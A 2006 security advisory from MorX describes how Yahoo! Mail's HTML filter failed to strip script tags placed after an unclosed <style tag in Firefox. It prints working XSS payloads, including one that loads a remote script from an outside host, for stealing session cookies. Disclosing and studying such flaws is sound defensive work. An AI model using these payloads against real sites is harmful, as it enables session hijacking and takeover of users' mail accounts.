Title: Yahoo! Mail Filter Bypass

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: january 2006
published: 26 july 2006
MorX Security Research Team
http://www.morx.org
http://www.morx.org/yahoo-firefox-bypass.txt

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Filter bypass / Cross Site Scripting

Severity: Medium/High

Tested to be vulnerable on: FireFox 1.5.0.4

not vulnerable: Microsoft IE 6.0, Opera 8.54

Details:

few months ago i have published a vulnerability affecting Yahoo mail with
MS IE, where yahoo mail filter failed to detect script attributes in
combination with the style attribute as a tag,

the combination code was:
<STYLE onload="alert(document.cookie)"> </STYLE>

few days later yahoo patched the above combination

so now if you try to send your self that code, you will see that yahoo
filters it this way

<style onfiltered="alert(document.cookie)"> </style>

this is not a good way of filtering, since yahoo filtered only the
"onload" attribute

few days later i received some emails asking how a similar
bypass-combination can be executed on other browsers such as firefox since
that one worked only on IE, after making some tests i realised that
firefox will execute any js code proceeded by <style as a tag

example:

<style <script>alert('a')</script>
or
<style <body onload="alert('a')">

note that <style must be left open, if you close it with </style> firefox
wont execute the js code

in fact the first combination will not be filtered by yahoo mail, usualy
yahoo filters <script> and </script> but if proceeded by the <style tag it
wont be filtered at all which will lead to script execution on firefox and
leads to user account compromise

exploit code example

<style <script>alert(document.cookie)</script>

<style <script SRC=http://www.morx.org/xss.js></script>

as you can see here from my yahoo mail message source code, the code is
left unfiltered:


<div id=message>


<!-- type = text -->


<style <script SRC=http://www.morx.org/xss.js></script><BR>


Impact:

an attacker can send the unfiltered code as an html email to a yahoo mail
user with FireFox. Once the victim opens the malicious email the
javascript content will be executed in the the target browser. This will
allow user's session cookie theft, giving the attacker access to the
victim mail box for about 24 hours (until the cookie expires)

Screen captures:

www.morx.org/yahoo-firefox-bypass.jpg

workaround:

Switch to another browser, or disable script execution until a patch is
released

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The exploit code is to be used on your OWN email account. I
cannot be held responsible for any of the above. comments or additional
questions feel free to email me at simo_at_morx_org